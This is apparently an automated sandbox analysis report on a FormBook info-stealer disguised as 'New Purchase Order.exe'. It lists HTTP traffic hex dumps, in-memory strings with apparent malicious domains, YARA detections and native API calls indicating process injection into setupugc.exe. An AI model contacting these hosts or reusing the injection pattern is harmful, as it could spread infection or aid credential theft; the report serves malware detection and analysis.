            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 07:03:49 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 07:03:51 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20
            Source: setupugc.exe, 00000011.00000002.3379647495.0000000004044000.00000004.10000000.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3379292512.0000000002D14000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2689415276.0000000039C64000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: New Purchase Order.exe, 00000000.00000002.2165111682.0000000002EED000.00000004.00000800.00020000.00000000.sdmp, hbaiQWstL.exe, 0000000A.00000002.2312499541.000000000351D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SguBfrlSDIFxPr.exe, 00000014.00000002.3381064714.0000000004DB3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.angelenterprise.biz
            Source: SguBfrlSDIFxPr.exe, 00000014.00000002.3381064714.0000000004DB3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.angelenterprise.biz/efkd/
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: setupugc.exe, 00000011.00000002.3379647495.000000000481E000.00000004.10000000.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3379292512.00000000034EE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: setupugc.exe, 00000011.00000003.2567790665.0000000007ECA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033(
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: setupugc.exe, 00000011.00000002.3379647495.000000000468C000.00000004.10000000.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3379292512.000000000335C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.masteriocp.online/wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDT

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 9.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 9.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: New Purchase Order.exe
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0042C593 NtClose,9_2_0042C593
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812B60 NtClose,LdrInitializeThunk,9_2_01812B60
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01812DF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01812C70
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018135C0 NtCreateMutant,LdrInitializeThunk,9_2_018135C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01814340 NtSetContextThread,9_2_01814340
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01814650 NtSuspendThread,9_2_01814650
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812B80 NtQueryInformationFile,9_2_01812B80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812BA0 NtEnumerateValueKey,9_2_01812BA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812BE0 NtQueryValueKey,9_2_01812BE0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812BF0 NtAllocateVirtualMemory,9_2_01812BF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812AB0 NtWaitForSingleObject,9_2_01812AB0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812AD0 NtReadFile,9_2_01812AD0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812AF0 NtWriteFile,9_2_01812AF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812DB0 NtEnumerateKey,9_2_01812DB0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812DD0 NtDelayExecution,9_2_01812DD0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812D00 NtSetInformationFile,9_2_01812D00
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812D10 NtMapViewOfSection,9_2_01812D10
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812D30 NtUnmapViewOfSection,9_2_01812D30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812CA0 NtQueryInformationToken,9_2_01812CA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812CC0 NtQueryVirtualMemory,9_2_01812CC0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812CF0 NtOpenProcess,9_2_01812CF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812C00 NtQueryInformationProcess,9_2_01812C00
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812C60 NtCreateKey,9_2_01812C60
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812F90 NtProtectVirtualMemory,9_2_01812F90
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812FA0 NtQuerySection,9_2_01812FA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812FB0 NtResumeThread,9_2_01812FB0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812FE0 NtCreateFile,9_2_01812FE0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812F30 NtCreateSection,9_2_01812F30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812F60 NtCreateProcessEx,9_2_01812F60
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812E80 NtReadVirtualMemory,9_2_01812E80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812EA0 NtAdjustPrivilegesToken,9_2_01812EA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812EE0 NtQueueApcThread,9_2_01812EE0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812E30 NtWriteVirtualMemory,9_2_01812E30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01813090 NtSetValueKey,9_2_01813090
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01813010 NtOpenDirectoryObject,9_2_01813010
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018139B0 NtGetContextThread,9_2_018139B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01813D10 NtOpenProcessToken,9_2_01813D10
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01813D70 NtOpenThread,9_2_01813D70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A4340 NtSetContextThread,LdrInitializeThunk,17_2_036A4340
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A4650 NtSuspendThread,LdrInitializeThunk,17_2_036A4650
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2B60 NtClose,LdrInitializeThunk,17_2_036A2B60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2BE0 NtQueryValueKey,LdrInitializeThunk,17_2_036A2BE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_036A2BF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2BA0 NtEnumerateValueKey,LdrInitializeThunk,17_2_036A2BA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2AF0 NtWriteFile,LdrInitializeThunk,17_2_036A2AF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2AD0 NtReadFile,LdrInitializeThunk,17_2_036A2AD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2F30 NtCreateSection,LdrInitializeThunk,17_2_036A2F30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2FE0 NtCreateFile,LdrInitializeThunk,17_2_036A2FE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2FB0 NtResumeThread,LdrInitializeThunk,17_2_036A2FB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2EE0 NtQueueApcThread,LdrInitializeThunk,17_2_036A2EE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2E80 NtReadVirtualMemory,LdrInitializeThunk,17_2_036A2E80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2D30 NtUnmapViewOfSection,LdrInitializeThunk,17_2_036A2D30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2D10 NtMapViewOfSection,LdrInitializeThunk,17_2_036A2D10
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2DF0 NtQuerySystemInformation,LdrInitializeThunk,17_2_036A2DF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2DD0 NtDelayExecution,LdrInitializeThunk,17_2_036A2DD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2C60 NtCreateKey,LdrInitializeThunk,17_2_036A2C60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2C70 NtFreeVirtualMemory,LdrInitializeThunk,17_2_036A2C70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2CA0 NtQueryInformationToken,LdrInitializeThunk,17_2_036A2CA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A35C0 NtCreateMutant,LdrInitializeThunk,17_2_036A35C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A39B0 NtGetContextThread,LdrInitializeThunk,17_2_036A39B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2B80 NtQueryInformationFile,17_2_036A2B80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2AB0 NtWaitForSingleObject,17_2_036A2AB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2F60 NtCreateProcessEx,17_2_036A2F60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2FA0 NtQuerySection,17_2_036A2FA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2F90 NtProtectVirtualMemory,17_2_036A2F90
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2E30 NtWriteVirtualMemory,17_2_036A2E30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2EA0 NtAdjustPrivilegesToken,17_2_036A2EA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2D00 NtSetInformationFile,17_2_036A2D00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2DB0 NtEnumerateKey,17_2_036A2DB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2C00 NtQueryInformationProcess,17_2_036A2C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2CF0 NtOpenProcess,17_2_036A2CF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2CC0 NtQueryVirtualMemory,17_2_036A2CC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A3010 NtOpenDirectoryObject,17_2_036A3010
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A3090 NtSetValueKey,17_2_036A3090
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A3D70 NtOpenThread,17_2_036A3D70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A3D10 NtOpenProcessToken,17_2_036A3D10
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D08FD0 NtCreateFile,17_2_00D08FD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D09140 NtReadFile,17_2_00D09140
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D092D0 NtClose,17_2_00D092D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D09230 NtDeleteFile,17_2_00D09230
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D09430 NtAllocateVirtualMemory,17_2_00D09430
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_02CFE0840_2_02CFE084
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_074D1DF00_2_074D1DF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_074D00400_2_074D0040
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_074D00060_2_074D0006
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_08089BB80_2_08089BB8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_08089FF00_2_08089FF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_0808C0380_2_0808C038
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_0808C0480_2_0808C048
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_0808A4280_2_0808A428
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_080897800_2_08089780
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_004019D39_2_004019D3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_004185939_2_00418593
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_004030509_2_00403050
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_004100639_2_00410063
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0040E0E39_2_0040E0E3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0042EB939_2_0042EB93
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_004184D89_2_004184D8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_004024B09_2_004024B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0040FE439_2_0040FE43
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0040FE3B9_2_0040FE3B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0041677E9_2_0041677E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_004167839_2_00416783
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A01AA9_2_018A01AA
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018941A29_2_018941A2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018981CC9_2_018981CC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D01009_2_017D0100
